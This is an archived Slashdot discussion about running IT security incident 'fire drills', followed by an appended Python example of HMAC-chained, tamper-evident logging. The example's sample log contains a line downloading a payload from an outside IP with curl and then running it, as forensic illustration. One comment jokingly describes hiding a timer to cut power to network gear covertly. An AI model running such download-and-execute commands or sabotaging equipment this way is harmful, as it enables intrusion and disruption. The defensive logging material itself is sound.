Slashdot Mirror


Do We Need Regular IT Security Fire Drills?

An anonymous reader writes: This article argues that organizations need to move beyond focusing purely on the prevention of security incidents, and start to concentrate on what they will do when an incident occurs. IT security "fire drills," supported by executive management, should be conducted regularly in organizations, in order to understand the appropriate course of action in advance of a security breach. This includes recovering evidence, identifying and resolving the root cause of the incident (not just the symptoms), and undertaking a forensic investigation.

12 of 124 comments

  1. That's a different skill-set by phantomfive · · Score: 3, Insightful

    This includes recovering evidence, identifying and resolving the root cause of the incident (not just the symptoms), and undertaking a forensic investigation.

    That is not a skill set most IT departments have.

    --
    "First they came for the slanderers and i said nothing."
    1. Re:That's a different skill-set by Livius · · Score: 3, Insightful

      That is not a skill set most IT departments have.

      I think that's the point.

    2. Re:That's a different skill-set by silas_moeckel · · Score: 4, Insightful

      Having a plan can be: we have a contract with these guys to do this sort of work, along with all the info they need, and all the paperwork and checking required.

      --
      No sir I dont like it.
    3. Re:That's a different skill-set by Lumpy · · Score: 5, Funny

      90% of all IT departments can be driven bat shit crazy by installing a simple light timer on a router or switch and hiding it in the rat's nest of power and other cables. Set the timer to "anti-burglar" mode, where it adds randomness, and have it drop power to a piece of gear for only 10 minutes once a day, because in 10 minutes, by the time they get to the network closet, it will be back on and running.

      It will drive them nuts and it will take MONTHS for them to find it; bet you they replace the router/switch before they find the timer. Bonus points if you make a decoy cable so that the timer is in the center of the cable hidden in the power tray and both ends look factory-standard IEC.

      --
      Do not look at laser with remaining good eye.
    4. Re:That's a different skill-set by bill_mcgonigle · · Score: 3, Informative

      That is not a skill set most IT departments have.

      Many IT departments don't even have enough skill overage to deal with one guy being sick, much less have excess expert capacity.

      Back in the '90s I watched a big medical center show the door to the guy who maintained the disaster recovery plan. He was "a cost center and never produced anything that anybody used."

      That's about the timeframe when professional IT ended in the general population. Or maybe it's just when the general population got an IT staff.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
  2. Answer.... by bobbied · · Score: 4, Insightful

    Yes.... a million times YES

    The "Be Prepared" motto isn't just for Boy Scouts, and it is not just about having what you need at hand, it's also about KNOWING what to do and being mentally prepared to do it quickly when required.

    --
    "File to fit, pound to insert, paint to match" - Aircraft Maintenance 101
  3. Nope by sexconker · · Score: 4, Interesting

    Just like real fire drills, they're pretty pointless and no one takes them seriously because there's no fire.
    So you either have a fruitless exercise that costs money because of all the interruptions, or you have a semi-fruitful exercise that costs a lot of money because of the extended interruptions caused by trying to simulate a real event.

    The latter will marginally improve the response to an actual incident. Neither will fly, because they cost money and aren't mandated by law.

  4. Re:Pro- vs Re- by epyT-R · · Score: 3, Interesting

    I've seen several departments that made reactive approaches a policy. Proactive employees were criticized and repeat offenders let go. I don't get it at all. It costs more money and makes more work and stress. Who wants to keep patching the same problem over and over?

  5. Re:No. by plover · · Score: 3, Funny

    That reminds me of one of those classic lists of airline mechanic log entries:
    "Evidence of oil leak on landing gear. Signed, Joe Pilot"
    "Evidence removed. Signed, Bob Mechanic"

    --
    John
  6. Re:Hopeless by fuzzyfuzzyfungus · · Score: 4, Insightful

    Arguably (on a systemic level, not on the level of how wonderful your current IT guy isn't) 'IT' being something that attracts actual talent qualifies as 'non drill respect'.

    As long as "IT" means 're-image the desktops and reboot the mailserver when it needs it, monkey!', you aren't exactly going to get the IT people whose prowess impresses you. On the plus side, you'll save money. On the minus side, it's going to be a bloodbath if you get unlucky in terms of hostile attention.

    So long as 'IT' is handled as a cost-center, necessary-evil, bunch of obstructionist ethernet janitors, that's how it'll be. On the plus side, modern technology is actually pretty easy to use, so if nothing atypically bad happens you can get away with some fairly dubious expertise at the wheel, and save accordingly; but if that's the philosophy at work you probably won't end up with an IT group capable of rising very far to the occasion should things go to hell (either because something that shouldn't have been complex went bad, or because lizard squad is on you).

    What is unclear, at present, is how, culturally and financially, any but the most zealously paranoid and deep-pocketed companies and state entities are going to have IT groups that are good for much more than the bare minimum. So long as you don't expect IT to be much better than a bunch of fuckups, there really isn't any reason to pay more or recruit more carefully (doing day-to-day IT is really more logistics and a little scripting than anything even remotely approaching CS or even code monkeying); but if that is how IT groups are recruited, no sane person will expect better of them; because why would they be capable of better?

    (Please note, I freely acknowledge, as an institution's IT person, that I'd be up shit creek if something genuinely nontrivial came gunning for me. I'm a hell of a lot cheaper than a real expert, I have good rapport with the users, strong command of standard logistics and management tools, things go nice and smooth; but I'm hardly a guru, nor do I expect to be treated as one. However, that's why I'm skeptical about this 'drill' thing. If you want to know that We Are Fucked if things get serious, I can tell you that for free (though we do have backup tapes, and I am perfectly capable of restoring, were the hypothetical attack to stop); but if you aren't interested in doing anything that might actually make you less fucked, because that'd cost a whole lot more, upset users, or both, what's the drill for? Perhaps there are organizations that actually live in ignorance, believing that they have hardcore experts willing to do routine IT stuff at relatively low prices; but those are likely a delusional minority. Everyone else just knows that having a bulletproof IT team would be an eye-watering outlay (that would spend most of its time twiddling its thumbs and swapping the occasional toner cartridge until something actually happens), while having an adequate-for-daily-use IT team is markedly cheaper and you can always claim that you 'followed industry best practices' if something goes pear-shaped.)

  7. Re:Pro- vs Re- by Anonymous Coward · · Score: 3, Funny

    Call the police, have the goon arrested then walk over and plug the server in. easy as lyin.

  8. These are simply audits by cwills · · Score: 3, Interesting

    What you described is nothing more than a full security / disaster recovery audit. If your data center (and management) is really serious about it, the company will need to invest both time and money to protect itself.

    • Create your security policies. This has to be directed from a management level that can put teeth into it, as well as people who understand what the real risks to the business are. Company lawyers and people with business continuity experience might be involved depending on the consequences of what a data breach or disaster might do to the business.
      • determine what risks your business has
      • determine what needs to be done to mitigate the identified risks
      • determine what needs to be logged in order to allow forensic analysis (assume that the compromised system(s) logs themselves may have been corrupted as part of the breach)
    • Make sure that the policies do not break the business. Also realize that security policies may require some processes to change.
    • Understand that implementing security policies can be expensive.
    • Employee education is a necessary step. Make sure employees understand what is being asked of them, and make sure that they understand what the policies are.
    • Ensure that you have a designated security focal point.
    • You will probably need an exception process. Make sure that any exceptions are documented with management, what is being done to mitigate any risks the exception has exposed, and how long the exception needs to be in place.

    Once you have your policies in place and everyone has "signed off" that they are in compliance, you can start with the auditing.

    • Have some level of auditing where it's a "friendly" review of the systems.
    • Audits should not instill fear, however there may need to be real consequences for negligent audit failures (depending on the business and type of data).
    • Depending on the business, you may want to have an independent auditing group come in and review your systems and policies
    • During an audit, system or process owners should only be held accountable to what is in the security policies. If the audit finds issues that are outside the policies, then management and the policy owner needs to respond.

    One additional comment, depending on the size of the organization, there may be a security group. If there is one, then it should be the responsibility of this group to perform any security monitoring or testing. Individuals outside the group should not be performing their own security or intrusion testing of systems that they are not directly responsible for. If a vulnerability is uncovered, it should be documented and reported to the security focal point and management.
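The bullet above about logging for forensic analysis assumes that a compromised host's own logs may have been altered. One common way to make such alteration detectable, shown here as an added example that is not part of the thread or of any commenter's setup, is to chain each record to the previous one with an HMAC whose key is held only by the off-host log collector. The key and the sample syslog-style lines below are constructed for illustration; the design assumption is that the host ships records and tags as they are produced, and that verification runs on the collector, never on the host that could have been compromised.

```python
import hashlib
import hmac

# Constructed example key. The design only works if this key lives on the log
# collector, not on the host producing the log: an attacker with root on the
# compromised host can rewrite local files but cannot forge tags without it.
COLLECTOR_KEY = b"example-collector-key-not-a-real-secret"

# Constructed sample records, loosely modelled on syslog auth messages.
SAMPLE_LOG = [
    "Jan 10 03:12:01 web01 sshd[4102]: Accepted publickey for deploy from 10.0.0.7",
    "Jan 10 03:12:09 web01 sudo: deploy : TTY=pts/0 ; COMMAND=/bin/bash",
    "Jan 10 03:13:44 web01 sshd[4131]: Accepted password for root from 203.0.113.5",
    "Jan 10 03:14:02 web01 sudo: root : COMMAND=/usr/bin/curl -o /tmp/x http://203.0.113.5/x",
    "Jan 10 03:14:03 web01 kernel: audit: type=1300 exe=/tmp/x",
]

GENESIS = b"\x00" * 32  # fixed starting point for the chain


def _tag(prev_tag: bytes, record: str, key: bytes) -> bytes:
    """HMAC over previous tag || record, so each tag commits to all history."""
    return hmac.new(key, prev_tag + record.encode("utf-8"), hashlib.sha256).digest()


def chain_records(records, key=COLLECTOR_KEY):
    """Return a list of (record, tag_hex) where each tag depends on the one before."""
    prev = GENESIS
    chained = []
    for rec in records:
        tag = _tag(prev, rec, key)
        chained.append((rec, tag.hex()))
        prev = tag
    return chained


def verify_chain(entries, key=COLLECTOR_KEY):
    """Recompute the chain. Return -1 if every entry checks out, otherwise the
    index of the first entry whose tag no longer matches. An edited record, a
    reordered record, or a deletion earlier in the file all surface here."""
    prev = GENESIS
    for i, (rec, tag_hex) in enumerate(entries):
        expected = _tag(prev, rec, key)
        try:
            stored = bytes.fromhex(tag_hex)
        except ValueError:  # mangled tag counts as a failure, not a crash
            return i
        if not hmac.compare_digest(expected, stored):
            return i
        prev = expected
    return -1


if __name__ == "__main__":
    entries = chain_records(SAMPLE_LOG)
    print("intact chain:", verify_chain(entries))

    # Attacker with root rewrites the root login line but keeps the old tag.
    edited = list(entries)
    edited[2] = ("Jan 10 03:13:44 web01 sshd[4131]: Connection closed by 203.0.113.5",
                 edited[2][1])
    print("edited record detected at index:", verify_chain(edited))

    # Attacker deletes the curl line outright; the next tag no longer lines up.
    deleted = entries[:3] + entries[4:]
    print("deleted record detected at index:", verify_chain(deleted))
```

Two caveats a practitioner should keep in mind: the chain cannot detect truncation of the tail (an attacker who simply drops the last N records leaves a valid prefix), so the collector must also record the last tag it received and expect the stream to continue from it; and the whole scheme collapses if the key is stored on the monitored host, because an attacker who can rewrite the log can then recompute every tag.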